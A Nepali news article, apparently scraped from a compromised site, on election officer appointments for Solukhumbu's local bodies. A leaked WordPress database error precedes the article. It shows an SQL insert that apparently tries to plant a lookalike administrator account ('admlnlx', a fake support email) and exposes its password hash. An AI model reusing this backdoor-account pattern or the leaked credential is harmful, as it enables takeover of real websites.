WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8dM.PTFZoqCKis4oyxjpJ0aBT6ksR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 13:06:42', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बुको मुख्य निर्वाचन अधिकृतमा जिल्ला न्यायाधीश सन्तोष प्रसाद पराजुली नियुक्त भएको छन । आइतबार सुचना प्रकाशित गर्दै निर्वाचन आयोगले ७७ जिल्लाका ७ सय ५३ वटै स्थानीय तहमा मुख्य निर्वाचन अधिकृत तथा पालिका निर्वाचन अधिकृत नियुक्त गरेको हो ।
सोलुखुम्ब जिल्ला अदालतका न्यायाधीश पराजुली सोलु दुधकुण्ड नगरपालिकामा खटिने गरि जिल्लाको प्रमुख निर्वाचन अधिकृतमा नियुक्त भएका छन । खुम्बु पासाङ ल्हामु गाउँपालिकामा स्थानीय पुर्वाधार विभागका हरी प्रसाद शर्मा, माप्य दुधकोशी गाउँपालिकामा सरकारी वकिल कार्यालय सोलुखुम्बुका जिल्ला न्यायधिवक्ता मीना गुरुङलाई निर्वाचन अधिकृतमा खटाएको छ ।
यस्तै थुलुङ दुधकोशी गाउँपालिका सर्वोच्च अदालतका उपरजिष्ट्रार अन्चन भट्राई, नेचा सल्यान गाउँपालिकामा राष्ट्रिय समावेशी आयोगका उपसचिव पुष्कर भट्राई, माहाकुलुङ गाउँपालिकामा लोक सेवा आयोगका उपसचिव प्रकाश गुरुङलाई खटाएको निर्वाचन आयोगका प्रवक्ता शालिग्राम शर्माले जानकारी दिए । शर्माका अनुसार लिखु पिके गाउँपालिकामा लोक सेवा आयोगका उपसचिव ऋषीराम भट्राई र सोताङ गाउँपालिकामा राजश्व अनुसन्धान विभागका निर्देशक कृण्णकुमार कार्कीलाई खटाएको छ ।
आयोगले आगामी बैशाख ३० गते हुने स्थानीय तहको निर्वाचनको तयारीलाई तिब्रता दिएको छ ।